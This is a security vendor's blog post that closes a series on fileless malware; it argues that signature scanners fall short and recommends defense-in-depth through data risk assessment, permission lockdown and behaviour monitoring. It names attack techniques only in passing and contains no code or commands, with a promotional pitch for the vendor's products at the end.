Adventures in Fileless Malware: Closing Thoughts

I think we can all agree that hackers have a lot of tricks and techniques to sneakily enter your IT infrastructure and remain undetected while they steal the digital goodies....
Michael Buckbee
3 min read
Last updated January 17, 2023

I think we can all agree that hackers have a lot of tricks and techniques to sneakily enter your IT infrastructure and remain undetected while they steal the digital goodies. The key takeaway from this series is that signature-based detection of malware is easily nullified by even low-tech approaches, some of which I presented.

I’m very aware that prominent security researchers are now calling virus scanners useless, but don’t throw them out just yet! There’s still a lot of mint-condition legacy malware on the Intertoobz used by lazy hackers that would be blocked by these scanners.

Get the Free Pentesting Active
Directory Environments e-book

A better philosophy in dealing with file-less malware and stealthy post-exploitation techniques is to supplement standard perimeter defenses, port scanners, and malware detectors with secondary lines of defense, and have strategies in place when the inevitable happens — including a breach response program.

I’m referring to, wait for it, defense-in-depth (DiD). This is a very practical approach to dealing with smart hackers who sneer at perimeter defenses, and mock signature scanning software.

Does DiD have its own problems? Sure. Those same security pros who have lost faith in traditional security measures are now promoting whitelisting of applications, which can be a very strong inner wall to protect against an initial breach.

But the code-free techniques I showed in this series can be used to even get around whitelisting. This falls under a new hacking trend called “living off the land”, which subverts legitimate tools and software for evil purposes. In the next few weeks, I’ll post a mini-tutorial on lol-ware. For those who want to do their homework ahead of time, start perusing this interesting github resource. Stay tuned.

ps-white-1


Q: Can you get around Windows security protections by sneaking forbidden commands into regsvr32.exe? A: Yes, next question.

Get Real About Data Security!

In my view, defense-in-depth is about minimizing liabilities: taking what could be a potential catastrophe and transforming it into something that’s not too terrible or costs too much.

The hacker got in, but because of your company’s excellent and restrictive permission policies, you prevented her from gaining access to sensitive data.

Or the hackers have obtained access to the sensitive data, but your awesome user-behavior analytics technology has spotted the intruders and disabled the accounts before a million credit cards could be exfiltrated.

Or perhaps the hacker has managed to find and exfiltrate a file of email addresses. However, your outstanding breach response program, which includes having near real-time information on abnormal file activities, enables you to contact the appropriate regulators (and customers affected) in near record time with detailed information on the incident, thereby letting you avoid fines and bad publicity.

Common Sense Defense Advice

Defense-in-depth is more of a mind-set and philosophy, but there are, some practical steps to take and, ahem, great solutions available to make it easier to implement.

If I had to take the defense-in-depth approach and turn it into three actionable bullet points, here’s what I would say:

  • Assess. Evaluate your data risks by taking an inventory of what you need to protect. Identify PII and other sensitive data, some of which can be under regulations, and is often scattered across huge file system. You need to work out who has access to it and who really should have access to it. Warning: this ain’t easy to do, unless you have some help.
  • Defend. Now that you’ve found the data, limit the potential damage of future breaches by locking it down: reduce broad and global access, and simplify permission structures – avoid one-off ACLs and use group objects. Minimize the overall potential risk by retiring stale data or other data that no longer serves its original function.
  • Sustain. Maintain a secure state by automating authorization workflows, entitlement reviews, and the retention and disposition of data. And finally, monitor for unusual user and system behaviors.

Need to make your defense in depth dream a reality? Learn how we can help.

What should I do now?

Below are three ways you can continue your journey to reduce data risk at your company:

1

Schedule a demo with us to see Varonis in action. We'll personalize the session to your org's data security needs and answer any questions.

2

See a sample of our Data Risk Assessment and learn the risks that could be lingering in your environment. Varonis' DRA is completely free and offers a clear path to automated remediation.

3

Follow us on LinkedIn, YouTube, and X (Twitter) for bite-sized insights on all things data security, including DSPM, threat detection, AI security, and more.

Try Varonis free.

Get a detailed data risk report based on your company’s data.
Deploys in minutes.

Keep reading

Varonis tackles hundreds of use cases, making it the ultimate platform to stop data breaches and ensure compliance.

adventures-in-fileless-malware,-part-v:-more-dde-and-com-scriplets
Adventures in Fileless Malware, Part V: More DDE and COM Scriplets
In this series of post, we’ve been exploring attack techniques that involve minimal efforts on the part of hackers. With the lazy code-free approach I introduced last time, it’s even possible to...
adventures-in-fileless-malware,-part-iii:-obfuscated-vba-scripts-for-fun-and-profit
Adventures in Fileless Malware, Part III: Obfuscated VBA Scripts for Fun and Profit
After yakking in the last two posts about malware-free or fileless attack techniques, we’re ready to handle a dangerous specimen. The Hybrid Analysis site is the resource I rely on to...
adventures-in-fileless-malware,-part-iv:-dde-and-word-fields
Adventures in Fileless Malware, Part IV: DDE and Word Fields
For this next post, I was all ready to dive into a more complicated fileless attack scenario involving multiple stages and persistence. Then I came across an incredibly simple code-free...
adventures-in-fileless-malware,-part-i
Adventures in Fileless Malware, Part I
When I first started looking into the topic of hackers living off the land by using available tools and software on the victim’s computer, little did I suspect that it would...